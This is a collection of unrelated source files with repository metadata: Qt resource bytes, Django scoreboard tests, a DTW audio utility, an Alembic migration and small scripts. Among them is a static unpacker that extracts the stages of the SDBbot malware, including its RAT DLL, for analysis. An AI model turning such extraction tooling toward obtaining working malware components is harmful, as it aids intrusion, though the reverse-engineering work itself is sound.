\x11\x92\x49\x9f\xb8\x27\xd6\x4f\x0e\x56\x43\x99\x98\xd2\x69\xe4\ \x7c\x1b\x39\xe1\x7a\x48\x4c\xbc\x3c\x71\xdf\xfa\xc4\xc7\x8d\x4b\ \x63\x35\x88\x90\xa6\x7a\x3d\x13\xbf\xf7\x50\x00\x1c\x7b\x1d\x63\ \x4e\x7f\xaa\x94\x54\xa3\xa8\xa3\x7e\x0d\xef\xd8\x63\xf7\xf7\x8e\ \xf0\xe4\xba\xe7\xf9\xee\x77\x6e\x65\xc3\x4b\x8f\x31\x9c\xe9\xc3\ \x71\x2b\x28\x11\xce\xc9\x18\x2a\x81\x21\xac\x50\x2f\x4b\xc6\x50\ \x22\x2c\x84\x4b\x22\x55\x68\x28\xfc\xa0\xe2\x7b\x41\xfe\x85\xb2\ \x37\x72\xaf\x56\xc5\x5f\x6b\x3f\xf2\xf8\x90\xfd\x52\xb3\xb6\xd1\ \xb4\x26\x40\x9a\xf6\x2a\x40\xd2\xf3\x3a\xc3\x54\xc9\x85\x51\xa3\ \x6d\x75\x22\xd2\x7d\x6e\x54\xb5\x9f\x68\xaa\xd8\x34\x53\x59\x20\ \x02\x10\x3e\x81\x0e\xf0\x75\x99\x8a\x9f\xa7\xe2\x65\xb1\x2b\x43\ \x64\x4b\x7d\xe4\xec\x7e\x0a\xa5\x41\x1c\xbf\x84\xd6\x01\xe9\x64\ \x17\x73\x7a\x0e\xe7\x82\xd5\x17\x71\xfe\xc5\x67\xb2\x78\xf9\x3c\ \x4c\x4b\x35\x84\x45\x23\x88\x4c\xbc\xad\xfe\x54\x9f\x0a\x6a\x14\ \xb5\x4c\xe5\xc4\x0f\x79\x60\x54\x77\xa6\xbc\xd6\xc7\x1c\x2c\x42\ \x1a\x73\xf0\xf5\x97\x1b\x01\xa3\x51\xb4\x51\xff\x3d\x63\x97\x85\ \x10\xf8\x5e\xc0\xc8\x50\x8e\x7b\xee\x58\xc7\x9d\x77\xdd\xcd\xe3\ \x4f\x3e\xc4\x60\x66\x0f\xa5\x4a\x01\x49\x75\x00\x51\x45\x30\x44\ \x14\x25\xa3\xa1\xac\x7d\x4d\x95\x37\xac\x69\x84\x73\x28\x92\x20\ \xf0\x6d\x4f\x17\x37\x3b\x7e\xfe\x5e\x37\xc8\xff\x26\x08\x9c\x17\ \x46\xca\x5b\xb3\xcd\xa3\xa1\x69\x4d\x80\x34\xed\x0f\xb6\x13\x0e\ \xbb\xc2\x50\xca\x5c\x60\xc8\xe8\x1b\x22\xaa\xf5\x8d\x31\x73\xda\ \x89\x51\x23\xd9\x2a\x84\x81\x50\x02\x08\x27\xc5\x3d\xbf\x82\xeb\ \x15\x29\x7b\x79\xca\xee\x28\xb6\x33\x4a\xce\xde\x4f\xd6\xee\xa3\ \x54\xc9\xe2\x78\x36\x08\x88\x9a\x29\xe6\xce\x5c\xc2\xd2\x25\x47\ \x73\xd5\x3b\x2e\x65\xc9\x51\x0b\x99\x39\x7b\x1a\x42\x8a\x49\x50\ \x78\xad\xa7\xa9\x52\x49\x53\xa5\x9c\x1a\xc1\x65\x2c\xbd\x54\xbf\ \x06\x76\x62\x64\xd2\x28\x7d\xd6\x28\x85\x56\x9f\x86\x3a\xd8\xe5\ \x89\xe7\xf5\xa7\xfa\x9f\x9b\x1d\x2d\xb0\x73\x5b\x1f\xff\xf9\xf3\ \x35\x3c\xf0\xd0\x43\x6c\xd9\xf1\x0c\x99\xfc\x20\xa5\x4a\xbe\xb6\ \x2b\x45\xc9\x08\x86\x8c\xa0\x44\x24\x84\x86\xb4\x50\x22\x16\x0e\ \x58\x0a\x0b\x59\x3d\x21\x04\x41\x50\x09\xbc\xa0\xf4\xbc\x17\x14\ \xd7\xf8\xba\x7c\xb7\x46\x3f\x19\x68\xbf\x3c\x64\xbf\xd8\x74\x0c\ \x4d\x6b\x02\xa4\x69\xff\xb5\xb6\x6a\xc9\xdb\x05\x82\x23\x4c\x11\ \x5d\x1d\x31\x5b\x2f\x88\x1a\xd3\x56\xc4\xcd\xf6\x94\x92\x46\x54\ \x48\x10\x04\x04\x3a\xc0\x0b\x1c\xbc\xa0\x44\xc5\x2d\xe0\x78\x05\ \x6c\x27\x43\xc9\x19\x25\x5b\x8d\x4e\x8a\xe5\x11\xdc\xa0\x82\xeb\ \x95\xb0\xcc\x18\x6d\xa9\x6e\x3a\xda\x67\x72\xd6\x69\xe7\x71\xc2\ \xc9\x2b\x58\x75\xfa\xd1\xf4\xcc\xe9\xac\x09\x26\x36\xaa\x8b\x4c\ \x84\xc3\xa1\xae\xbf\x1a\x80\x34\xaa\x47\x1c\x2c\x1d\x36\xb1\xde\ \x52\x7f\x5b\x3d\x00\x26\x9e\xd7\xdf\xdf\xc8\x7c\x3f\x20\x97\x2d\ \xf2\xfc\x53\x9b\x79\x6a\xfd\x46\xd6\xde\x7f\x17\x5b\xb6\x6d\x64\ \x24\xd7\x87\x6d\xe7\x08\xb4\x0e\xf5\xb2\x84\x15\x2e\x19\x93\x51\ \x94\x30\xab\xd0\x88\x54\x61\x11\x76\x4c\x09\x61\x22\x31\x90\xd2\ \x42\xeb\x40\x07\xda\x1d\x75\x82\xec\x3e\x2f\x28\xde\xe3\x6b\xe7\ \x4e\xd0\x1b\x86\xec\x8d\xf9\xe6\x7f\x77\xd3\x9a\x00\x69\xda\x7f\ \x9b\x1d\xbb\xf8\x82\x78\xc2\xec\x8e\x5a\x32\x71\xaa\x52\xe6\x9b\ \x12\xd6\xf4\xa3\x4d\x15\x3f\x22\xa2\x12\xc9\x00\x8d\x12\x02\x4d\ \x80\x1f\x84\xd2\xee\xae\x5f\xa1\xe2\x16\x28\x3b\x39\xca\x6e\x16\ \xdb\xc9\x60\x97\x33\x14\x2b\x43\x14\xcb\xc3\x38\x9e\x8d\xe3\x95\ \x70\xfd\x0a\x11\x2b\x8a\xa5\x12\x74\x77\xcd\x60\xe1\x9c\xe5\x2c\ \x5c\xb0\x98\xd5\x17\x9c\xc6\x92\x23\x17\xd2\x3e\x2d\x45\xba\x3d\ \x85\x69\x4e\x2d\x53\x32\x15\x1c\xa6\x82\xc5\xa1\xd2\x52\x13\x23\ \x8f\xa9\xae\xbf\x16\xd3\x5a\x53\xc8\xdb\x64\x47\x0a\xec\xdd\x33\ \xc0\xba\xdf\xfd\x9e\x27\x9e\x78\x96\x9d\xbd\x1b\xd9\xbe\x7d\x0b\ \x15\xcf\xc6\x2e\xe7\xd0\x81\xa8\xca\x9f\xa8\x10\x16\xc2\xac\xb6\ \xd3\x9a\x48\x19\xa9\x82\x63\xac\xc5\xd6\x08\x23\x0c\xcc\x2a\x9c\ \x0c\xfc\xa0\x82\xc6\xdf\xe8\xf8\x23\xbb\x7d\xed\xfe\x5a\x08\xb9\ \xa6\xe8\xee\x1f\xca\x57\xf6\x35\x3b\xa8\x9a\xd6\x04\x48\xd3\xfe\ \x38\xec\x9c\x95\x7f\xaf\x1c\x4a\x47\x13\xb8\x6f\x4a\xc7\xe6\x1e\ \xa1\x44\xec\x8c\x98\xd1\xd6\x22\x85\x8c\x4b\x61\x84\xb5\x13\x34\ \x5e\xe0\xe3\x7a\x65\xbc\xa0\x82\xe3\x96\x70\xdc\x02\x65\xaf\x40\ \xc9\xc9\x86\x80\x71\xb3\x14\xcb\xa3\x94\x9c\x2c\x8e\x6b\xe3\xfa\ \x76\x15\x42\x15\x94\x30\xb1\xac\x08\x6d\xe9\x6e\x62\x56\x9a\xae\ \xce\x6e\x8e\x39\xe6\x18\x8e\x5a\x7a\x0c\xdd\xb3\x3a\x99\x33\x77\ \x3a\x5d\x33\xda\x98\xd6\xd1\x46\x24\x6a\x1e\x90\x7c\xff\x6f\xb0\ \x50\x2e\x06\xd0\xe1\x9c\x88\xeb\xfa\xe4\x33\x45\x06\x07\x46\xd9\ \xb7\xa7\x9f\xfe\xde\x61\xb6\x6d\xdd\xc2\x13\x4f\x3f\xc5\x8e\x9d\ \x3b\x28\x97\x0b\x0c\x67\xf7\x51\xac\x0e\x46\x86\xc7\xe2\x18\x2c\ \x8c\x6a\x3a\xca\xac\x2d\x82\x92\xd2\x3c\x10\x65\x08\x0b\x81\x19\ \x42\x45\x98\x08\x61\x21\x45\xad\x43\xcc\xf5\x75\xc9\x0e\x02\xf7\ \xe9\x92\x3f\xb8\x59\xa3\xef\x32\x64\x7c\x7d\x7f\xe1\xe9\x91\xe6\ \x7f\x69\xd3\x9a\x00\x69\xda\x1f\xbd\xbd\xe1\xb8\xf7\x99\x8e\x57\ \x48\x47\x8d\xf4\x72\x25\x22\x2b\x0d\x23\x76\x76\xdc\xec\x9c\xaf\ \xb0\x0e\x37\x64\x4c\x08\x21\xab\x8e\xd6\xc7\xf3\x7d\xfc\xc0\xc5\ \x0d\x1c\x5c\xaf\x84\xe7\x96\x70\xbc\x0a\x65\x37\x4b\xd9\xb5\x71\ \xdc\x02\x8e\x57\xa4\xec\x16\x29\xbb\x59\x3c\xbf\x4c\xc5\xcd\xe3\ \x05\x15\x82\xe0\x80\xd4\x7b\xa0\x3d\x0c\x15\xce\x41\x44\xcc\x24\ \x42\x4b\x62\xf1\x24\xe9\x74\x9a\x69\xd3\xa6\x31\xbd\xbb\x9b\x98\ \xec\xc0\xb4\x2c\xe2\x89\x04\xad\xe9\x16\xda\xdb\x5a\x68\x9d\x96\ \x26\x91\x8c\x11\x89\x55\x57\xb1\x5a\x06\x96\x29\x43\x95\x2d\x1f\ \x4a\x15\x07\x1d\x68\xca\x25\x87\x4a\xb9\xc2\xe8\x68\x8e\xcc\x48\ \x8e\x6c\x26\x47\x2e\x97\xa3\x6c\x3b\xf8\x46\x9e\xc1\xe1\x7e\x06\ \xfa\x07\xc8\x66\x33\xe4\x0b\x39\x7c\xcf\xc3\xd5\x36\x15\xa7\x8c\ \xe7\x79\x68\x1d\x84\xce\x1e\x59\x15\x4c\x94\x55\x28\x84\x53\xec\ \x61\x7d\x62\x4c\x60\x31\x4c\x39\x49\xaa\x11\x85\x08\x97\x42\x1d\ \x38\x0f\xe7\x32\x04\x02\x5f\x3b\x40\xd0\x5b\xf1\x33\xbd\xc0\x3d\ \x15\x2f\xb3\x45\x4a\xf3\xbe\x20\x70\x0b\x23\xe5\x2d\xcd\xd4\x54\ \xd3\x9a\x00\x69\xda\x9f\xbe\xad\x3e\xfe\x7d\x6d\x25\x6f\xe4\xd8\ \xce\xd8\x31\xe9\xb2\x37\x74\x51\xc2\x9c\xbe\x58\x08\xb5\xdc\x92\ \xad\x02\x88\x4a\x24\x81\x86\x20\x70\x09\x34\xb8\x9e\x83\xef\x57\ \x70\x3d\x07\xc7\xb3\x71\x7d\x07\xd7\xab\x50\xf1\x0a\xb8\x5e\x09\ \xc7\x2d\xe2\xf9\x25\xdc\xc0\xc1\xf7\xc3\x9a\x8b\xeb\x87\x72\xef\ \x5e\x50\xaa\xaa\xf6\x86\xd3\xe2\x63\xaa\xbd\x5a\x7b\xd5\x29\xf2\ \x5a\xdc\xc0\xd8\xcc\xc7\xf8\xdb\x1a\x1c\x2c\xe3\x64\x4c\xc6\xeb\ \x65\x49\x04\xa0\xaa\xb2\x26\x21\x1c\x10\x61\x34\xa1\x50\x50\x85\ \x82\xa8\xee\xfb\x90\x55\xd5\xdd\x30\x32\x1b\x93\x6d\x57\x75\x42\ \x8b\x46\x75\x52\x5e\x81\x94\x28\x14\xbe\xf6\x00\xfc\x40\x3b\x65\ \x2f\xb0\x47\x03\xed\xfc\x3e\xd0\xfe\x13\x81\xae\x3c\xe5\x04\x85\ \xfe\x6c\x79\xe7\xc6\x8e\xf8\x52\x31\x64\x6f\x6c\x1e\xd4\x4d\x6b\ \x02\xa4\x69\x7f\xde\x76\xca\x51\x6f\x9d\x66\xa9\x54\x4c\x62\xac\ \x08\xf0\x97\x27\x8c\xee\x45\x41\xe0\x9f\x96\xb4\x66\x57\x7c\xed\ \x1f\x46\xa0\x2c\x85\x05\x1a\xbc\xc0\x01\xad\xf0\x7c\x07\xcf\x77\ \x71\x7d\x27\xbc\xec\x95\xc3\x82\xbd\x1f\x76\x81\xf9\x7e\x18\xc9\ \xf8\x41\xa5\x7a\x72\x6a\x52\xf6\x81\xf6\x81\x50\x72\x24\x14\x94\ \xd4\xe8\xa0\x2a\x49\x52\x03\x49\x15\x2e\xb5\xe3\x22\xbc\x1e\xa6\ \xc1\x44\x35\x4d\x55\x8f\x12\x59\x03\xc9\x98\xc2\x2e\xa8\xaa\xf4\ \xa2\xac\x49\xa6\x48\xa1\xaa\x08\x52\x55\x15\x5e\x51\x85\x4f\x78\ \x5d\x62\xd4\x78\x24\x90\xe1\x6b\xd4\x0e\xa0\x76\xb9\x41\xbe\xe4\ \x05\xf9\x01\x21\xd4\x1a\xdb\x1d\xcc\xc5\xcc\xce\x3b\xf3\xce\x2e\ \x3f\x66\x74\xee\x1d\xb6\x5f\x6e\x1e\xc0\x4d\x6b\x02\xa4\x69\x4d\ \x5b\x75\xe4\x5b\x4c\x27\x28\x32\x23\x7e\x92\xb5\xaf\xf0\xd8\x99\ \x9d\xd1\x15\x9e\xe3\x17\x4e\xf1\x03\xef\xd8\x16\x73\xae\xae\x78\ \xb9\xd7\x49\x11\x33\x0c\x91\xd4\x04\x32\xe2\x07\x3e\x7e\xe0\x23\ \xb4\xc2\x0b\xc0\xf7\xcb\xe1\xd2\xa9\xea\xed\x41\xe0\xe2\x05\x6e\ \x58\x5f\xa8\xe9\x56\x79\x68\xed\x85\x60\xd0\x41\x15\x10\x07\x00\ \x12\xea\x5e\x8d\xa1\xc3\xaf\x7b\x75\x7a\x42\x9c\x22\x6a\x29\xa4\ \x5a\xed\x03\xaa\x52\xf2\xd5\x6f\x13\x07\x62\x93\x10\x1e\x06\x02\ \x6a\xb2\xee\x00\x5a\x68\xcf\x0b\xca\xae\x17\x14\x23\x12\xe3\x19\ \x5f\x57\x76\x57\xfc\x61\x3b\xaa\xba\xff\x23\xe7\xbe\x62\x46\x54\ \xdb\xb3\x5a\xeb\x1d\x45\xb7\xd7\x2a\xb9\x23\x95\xe6\x7f\x49\xd3\ \x9a\x00\x69\x5a\xd3\x5e\xa3\x9d\xba\xf8\x9a\xc8\x9e\xcc\x03\x0b\ \xda\x63\xcb\x2b\x11\x99\x9a\x35\x60\xbf\x70\x61\xd2\x98\xef\xa4\ \xcd\x85\x45\xdb\x1b\x38\xcd\xf1\x4a\xa7\x47\xe5\x34\xc7\x94\xa9\ \x30\x52\x09\x7c\x74\xa0\x09\x74\xdd\xa4\x38\x01\xe8\xb1\x1d\x22\ \xf5\x5d\x5a\x41\x5d\x52\xeb\x80\x58\x62\x78\x53\x30\x01\x1c\x07\ \x76\x90\xe8\xfa\xf4\x97\x0e\xea\xd2\x61\x41\x35\x80\x19\x4b\x96\ \xf9\xb8\x41\x11\xc7\xcf\x1b\x9e\xb6\xf7\xc7\x55\xf7\x4f\xcb\xfe\ \x30\x45\xaf\x2f\x6e\x48\x73\x63\x44\x75\x3c\x90\x29\x6f\x4e\x98\ \xaa\x65\x30\x5b\xde\x39\xd0\xfc\x6b\x37\xed\x4f\xc5\xfe\xcf\x00\ \x0b\x8b\x56\x9a\xcd\xe5\xda\x06\x00\x00\x00\x00\x49\x45\x4e\x44\ \xae\x42\x60\x82\ " qt_resource_name = b"\ \x00\x04\ \x00\x07\x35\xdf\ \x00\x6c\ \x00\x6f\x00\x67\x00\x6f\ \x00\x08\ \x00\x35\x5c\x87\ \x00\x57\ \x00\x69\x00\x6d\x00\x62\x00\x2e\x00\x70\x00\x6e\x00\x67\ \x00\x0d\ \x07\x66\x73\xc7\ \x00\x77\ \x00\x69\x00\x6d\x00\x62\x00\x6c\x00\x65\x00\x64\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\ " qt_resource_struct = b"\ \x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\ \x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\ \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\ \x00\x00\x00\x24\x00\x00\x00\x00\x00\x01\x00\x00\x91\xc6\ " def qInitResources(): QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()
1.109375
1
makahiki/apps/managers/score_mgr/tests.py
justinslee/Wai-Not-Makahiki
1
12789730
<reponame>justinslee/Wai-Not-Makahiki """ test score_mgr """ import datetime from django.test import TransactionTestCase from django.contrib.auth.models import User from apps.managers.score_mgr import score_mgr from apps.managers.team_mgr.models import Group, Team from apps.managers.score_mgr.models import ScoreboardEntry, PointsTransaction from apps.utils import test_utils class ScoreboardEntryUnitTests(TransactionTestCase): """scoreboard test""" def setUp(self): """Generate test. Set the competition settings to the current date for testing.""" self.user = User(username="test_user", password="<PASSWORD>") self.user.save() self.current_round = "Round 1" test_utils.set_competition_round() self.user.get_profile().add_points(10, datetime.datetime.today(), "test") def testUserOverallRoundRankWithPoints(self): """Tests that the overall rank calculation for a user in a round is correct based on points.""" top_entry = ScoreboardEntry.objects.filter( round_name=self.current_round).order_by("-points")[0] entry, _ = ScoreboardEntry.objects.get_or_create( profile=self.user.get_profile(), round_name=self.current_round, ) entry.points = top_entry.points + 1 entry.last_awarded_submission = datetime.datetime.today() entry.save() self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), 1, "Check user is ranked #1 for the current round.") user2 = User(username="test_user2", password="<PASSWORD>") user2.save() profile2 = user2.get_profile() entry2, _ = ScoreboardEntry.objects.get_or_create( profile=profile2, round_name=self.current_round, ) entry2.points = entry.points + 1 entry2.last_awarded_submission = entry.last_awarded_submission entry2.save() self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), 2, "Check user is now second.") def testUserOverallRoundRankWithSubmissionDate(self): """Tests that the overall rank calculation for a user in a round is correct based on submission date.""" top_entry = ScoreboardEntry.objects.filter( round_name=self.current_round).order_by("-points")[0] entry, _ = ScoreboardEntry.objects.get_or_create( profile=self.user.get_profile(), round_name=self.current_round, ) entry.points = top_entry.points + 1 entry.last_awarded_submission = datetime.datetime.today() - datetime.timedelta(days=3) entry.save() self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), 1, "Check user is ranked #1 for the current round.") user2 = User(username="test_user2", password="<PASSWORD>") user2.save() profile2 = user2.get_profile() entry2, _ = ScoreboardEntry.objects.get_or_create( profile=profile2, round_name=self.current_round, ) entry2.points = entry.points entry2.last_awarded_submission = datetime.datetime.today() entry2.save() self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), 2, "Check user is now second.") def testUserTeamRoundRankWithPoints(self): """Tests that the team rank calculation for a round is correct based on points.""" # Setup dorm group = Group(name="Test group") group.save() team = Team(name="A", group=group) team.save() profile = self.user.get_profile() profile.team = team profile.save() # Set up entry top_entry = ScoreboardEntry.objects.filter( round_name=self.current_round).order_by("-points")[0] entry, _ = ScoreboardEntry.objects.get_or_create( profile=self.user.get_profile(), round_name=self.current_round, ) entry.points = top_entry.points + 1 entry.last_awarded_submission = datetime.datetime.today() entry.save() self.assertEqual(score_mgr.player_rank_in_team(self.user.get_profile(), self.current_round), 1, "Check user is ranked #1 for the current round.") user2 = User(username="test_user2", password="<PASSWORD>") user2.save() profile2 = user2.get_profile() profile2.team = team profile2.save() entry2, _ = ScoreboardEntry.objects.get_or_create( profile=profile2, round_name=self.current_round, ) entry2.points = entry.points + 1 entry2.last_awarded_submission = entry.last_awarded_submission entry2.save() self.assertEqual(score_mgr.player_rank_in_team(self.user.get_profile(), self.current_round), 2, "Check user is now second.") def testUserTeamRoundRankWithSubmissionDate(self): """Tests that the team rank calculation for a round is correct based on points.""" # Set up dorm group = Group(name="Test group") group.save() team = Team(name="A", group=group) team.save() # Create the entry for the test user profile = self.user.get_profile() profile.team = team profile.save() top_entry = ScoreboardEntry.objects.filter( round_name=self.current_round).order_by("-points")[0] entry, _ = ScoreboardEntry.objects.get_or_create( profile=self.user.get_profile(), round_name=self.current_round, ) entry.points = top_entry.points + 1 entry.last_awarded_submission = datetime.datetime.today() - \ datetime.timedelta(days=3) entry.save() # Create another test user user2 = User(username="test_user2", password="<PASSWORD>") user2.save() profile2 = user2.get_profile() profile2.team = team profile2.save() entry2, _ = ScoreboardEntry.objects.get_or_create( profile=profile2, round_name=self.current_round, ) entry2.points = entry.points entry2.last_awarded_submission = datetime.datetime.today() entry2.save() self.assertEqual(score_mgr.player_rank_in_team(self.user.get_profile(), self.current_round), 2, "Check user is now second.") def testRoundRankWithoutEntry(self): """Tests that the overall rank calculation is correct even if a user has not done anything yet.""" group = Group(name="Test group") group.save() team = Team(name="A", group=group) team.save() # Rank will be the number of users who have points plus one. overall_rank = 1 team_rank = 1 self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), overall_rank, "Check user is last overall for the current round.") self.assertEqual(score_mgr.player_rank_in_team(self.user.get_profile(), self.current_round), team_rank, "Check user is last in their team for the current " "round.") user2 = User(username="test_user2", password="<PASSWORD>") user2.save() profile2 = user2.get_profile() profile2.add_points(10, datetime.datetime.today(), "test") self.assertEqual(score_mgr.player_rank(self.user.get_profile(), self.current_round), overall_rank + 1, "Check that the user's overall rank has moved down.") self.assertEqual(score_mgr.player_rank_in_team(self.user.get_profile(), self.current_round), team_rank + 1, "Check that the user's team rank has moved down.") class PointsLogTest(TransactionTestCase): """test points log""" def setUp(self): self.user = User.objects.create_user("test", "<EMAIL>") test_utils.set_competition_round() def testAddPoints(self): """ Test that adding points creates a new entry in the points log. """ log_count = PointsTransaction.objects.count() profile = self.user.get_profile() profile.add_points(10, datetime.datetime.today(), "Hello world", None) profile.save() self.assertEqual(PointsTransaction.objects.count(), log_count + 1, "A new log should have been created.") log = profile.user.pointstransaction_set.all()[0] self.assertEqual(log.points, 10, "Points should have been awarded.") self.assertEqual(log.message, "Hello world", "Message should have been added.")
2.546875
3
become_yukarin/dataset/utility.py
nameless-writer/become-yukarin
562
12789731
<gh_stars>100-1000 import math import fastdtw import numpy _logdb_const = 10.0 / numpy.log(10.0) * numpy.sqrt(2.0) # should work on torch and numpy arrays def _sqrt(x): isnumpy = isinstance(x, numpy.ndarray) isscalar = numpy.isscalar(x) return numpy.sqrt(x) if isnumpy else math.sqrt(x) if isscalar else x.sqrt() def _exp(x): isnumpy = isinstance(x, numpy.ndarray) isscalar = numpy.isscalar(x) return numpy.exp(x) if isnumpy else math.exp(x) if isscalar else x.exp() def _sum(x): if isinstance(x, list) or isinstance(x, numpy.ndarray): return numpy.sum(x) return float(x.sum()) def melcd(X, Y, lengths=None): """Mel-cepstrum distortion (MCD). The function computes MCD for time-aligned mel-cepstrum sequences. Args: X (ndarray): Input mel-cepstrum, shape can be either of (``D``,), (``T x D``) or (``B x T x D``). Both Numpy and torch arrays are supported. Y (ndarray): Target mel-cepstrum, shape can be either of (``D``,), (``T x D``) or (``B x T x D``). Both Numpy and torch arrays are supported. lengths (list): Lengths of padded inputs. This should only be specified if you give mini-batch inputs. Returns: float: Mean mel-cepstrum distortion in dB. .. note:: The function doesn't check if inputs are actually mel-cepstrum. """ # summing against feature axis, and then take mean against time axis # Eq. (1a) # https://www.cs.cmu.edu/~awb/papers/sltu2008/kominek_black.sltu_2008.pdf if lengths is None: z = X - Y r = _sqrt((z * z).sum(-1)) if not numpy.isscalar(r): r = r.mean() return _logdb_const * r # Case for 1-dim features. if len(X.shape) == 2: # Add feature axis X, Y = X[:, :, None], Y[:, :, None] s = 0.0 T = _sum(lengths) for x, y, length in zip(X, Y, lengths): x, y = x[:length], y[:length] z = x - y s += _sqrt((z * z).sum(-1)).sum() return _logdb_const * s / T class DTWAligner(object): """ from https://github.com/r9y9/nnmnkwii/blob/4cade86b5c35b4e35615a2a8162ddc638018af0e/nnmnkwii/preprocessing/alignment.py#L14 """ def __init__(self, x, y, dist=lambda x, y: numpy.linalg.norm(x - y), radius=1) -> None: assert x.ndim == 2 and y.ndim == 2 _, path = fastdtw.fastdtw(x, y, radius=radius, dist=dist) path = numpy.array(path) self.normed_path_x = path[:, 0] / len(x) self.normed_path_y = path[:, 1] / len(y) def align_x(self, x): path = self._interp_path(self.normed_path_x, len(x)) return x[path] def align_y(self, y): path = self._interp_path(self.normed_path_y, len(y)) return y[path] def align(self, x, y): return self.align_x(x), self.align_y(y) @staticmethod def align_and_transform(x, y, *args, **kwargs): aligner = DTWAligner(*args, x=x, y=y, **kwargs) return aligner.align(x, y) @staticmethod def _interp_path(normed_path: numpy.ndarray, target_length: int): path = numpy.floor(normed_path * target_length).astype(numpy.int) return path class MelCepstrumAligner(DTWAligner): def __init__(self, x, y, *args, **kwargs) -> None: x = self._calc_aligner_feature(x) y = self._calc_aligner_feature(y) kwargs.update(dist=melcd) super().__init__(x, y, *args, **kwargs) @classmethod def _calc_delta(cls, x): x = numpy.zeros_like(x, x.dtype) x[:-1] = x[1:] - x[:-1] x[-1] = 0 return x @classmethod def _calc_aligner_feature(cls, x): d = cls._calc_delta(x) feature = numpy.concatenate((x, d), axis=1)[:, 1:] return feature
2.25
2
python/py-meld3/files/patch-setup.py
svalgaard/macports-ports
1
12789732
--- setup.py.orig 2007-10-16 16:08:20.000000000 -0700 +++ setup.py 2007-10-16 16:09:22.000000000 -0700 @@ -1,3 +1,5 @@ +from ez_setup import use_setuptools +use_setuptools() from distutils.core import setup, Extension import os
1.039063
1
code/dpp/centers/splines/__init__.py
bsouhaib/qf-tpp
0
12789733
from .splines_utils import *
1.070313
1
sdbbot_unpacker.py
Tera0017/SDBbot-Unpacker
11
12789734
<gh_stars>10-100 """ Author:@Tera0017 SDBbot static unpacker """ from sdbbot_unpacker_scripts.sdbbot_rat import SDBbotRatx86, SDBbotRatx64 from sdbbot_unpacker_scripts.sdbbot_loader import SDBbotLoaderx86, SDBbotLoaderx64 from sdbbot_unpacker_scripts.sdbbot_regblob import SDBbotRegBlobx86, SDBbotRegBlobx64 from sdbbot_unpacker_scripts.sdbbot_installer import SDBbotInstallerx86, SDBbotInstallerx64 from sdbbot_unpacker_scripts.sdbbot_gen_funcs import get_osa, gen_name, message, writeFile, process_args, ERROR01 class SDBbotUnpacker: def __init__(self, arguments): self.filepath = arguments.file self.osa = get_osa(file_path=self.filepath) def unpack(self): Installer, Loader, RegBlob, Rat = { 0x32: (SDBbotInstallerx86, SDBbotLoaderx86, SDBbotRegBlobx86, SDBbotRatx86), 0x64: (SDBbotInstallerx64, SDBbotLoaderx64, SDBbotRegBlobx64, SDBbotRatx64), }[self.osa] # Installer module sdbbot_installer = Installer(self.filepath) data = sdbbot_installer.decode() installer_filepath = gen_name(self.filepath, 'SDBbot_SdbInstallerDll_') writeFile(installer_filepath, data) message('SdbInstallerDll successfully dumped: {}'.format(installer_filepath)) # Loader module sdbbot_loader = Loader(installer_filepath) data = sdbbot_loader.decode() loader_filepath = gen_name(self.filepath, 'SDBbot_RegCodeLoader_') writeFile(loader_filepath, data) message('RegCodeLoader successfully dumped: {}'.format(loader_filepath)) # Registry Blob sdbbot_regblob = RegBlob(installer_filepath) data = sdbbot_regblob.decode() regblob_filepath = gen_name(self.filepath, 'SDBbot_RegBlob_') writeFile(regblob_filepath, data) message('RegBlob successfully dumped: {}'.format(regblob_filepath)) # RAT module sdbbot_rat = Rat(installer_filepath) data = sdbbot_rat.decode() rat_filepath = gen_name(self.filepath, 'SDBbot_RAT_BotDLL_') writeFile(rat_filepath, data) message('BotDLL successfully dumped: {}'.format(rat_filepath)) return True if __name__ == '__main__': sdbbot_unpacker = SDBbotUnpacker(process_args()) try: sdbbot_unpacker.unpack() except Exception: message(ERROR01)
2.03125
2
migrations/versions/24fad7bbfc10_drop_sighting_users.py
Matzexxxxx/Monocle
21
12789735
"""drop sighting_users Revision ID: 24fad<PASSWORD> Revises: <KEY> Create Date: 2017-10-22 11:45:40.968564 """ from alembic import op import sqlalchemy as sa import sys from pathlib import Path monocle_dir = str(Path(__file__).resolve().parents[2]) if monocle_dir not in sys.path: sys.path.append(monocle_dir) from monocle import db as db # revision identifiers, used by Alembic. revision = '24fad7bbfc10' down_revision = '<KEY>' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('sighting_users') # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('sighting_users', sa.Column('id', db.PRIMARY_HUGE_TYPE, nullable=False), sa.Column('username', sa.String(length=32), nullable=True), sa.Column('sighting_id', db.HUGE_TYPE, nullable=False), sa.ForeignKeyConstraint(['sighting_id'], ['sightings.id'], onupdate='CASCADE', ondelete='CASCADE'), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('username', 'sighting_id', name='ix_username_sighting_id') ) op.create_index(op.f('ix_sighting_users_sighting_id'), 'sighting_users', ['sighting_id'], unique=False) # ### end Alembic commands ###
1.398438
1
Analysis/Pedro/tests/dockTest/logFix.py
taoluwork/bcai
1
12789736
f = open('../../data/dockTest/logs.txt', 'r') line = f.readline() new = '' while line != '': if line.find('top ') >= 0 or line.find('python3') >= 0: new = new + line line = f.readline() f.close() f = open('../../data/dockTest/logs.txt', 'w') f.write(new) f.close()
2.90625
3
hytek_parser/export_xls/__init__.py
SwimComm/hytek-parser
1
12789737
